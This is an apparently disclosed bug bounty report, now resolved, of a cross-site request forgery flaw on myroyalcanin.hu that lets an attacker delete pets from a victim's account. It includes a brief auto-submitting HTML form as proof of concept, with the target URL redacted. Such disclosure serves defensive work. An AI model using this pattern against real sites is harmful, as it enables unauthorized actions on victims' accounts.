CSRF to delete a pet
Medium
M
Mars
Submitted None
Team Summary
Official summary from Mars
A vulnerability was reported where the ██████████ API endpoint at myroyalcanin.hu is vulnerable to Cross-Site Request Forgery (CSRF) attacks. This vulnerability allows an attacker to delete a pet from a victim's account without their knowledge or consent.
Actions:
Reported by
dd_06
Vulnerability Details
Technical details and impact analysis
## Summary:
The ```/kisallataim/ANIMAL_ID/delete``` API endpoint at **myroyalcanin.hu** is vulnerable to Cross-Site Request Forgery attacks.
This vulnerability allows an attacker to delete a pet from the victim's account.
(Sorry for my English, I'm French)
## Proof-of-Concept (PoC)
```html
<html>
<body>
<form action="████">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
You have to replace **ANIMAL_ID** with the ID of the victim's pet you wish to delete.
## Impact
An attacker can exploit this CSRF in order to delete the victim's pet.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)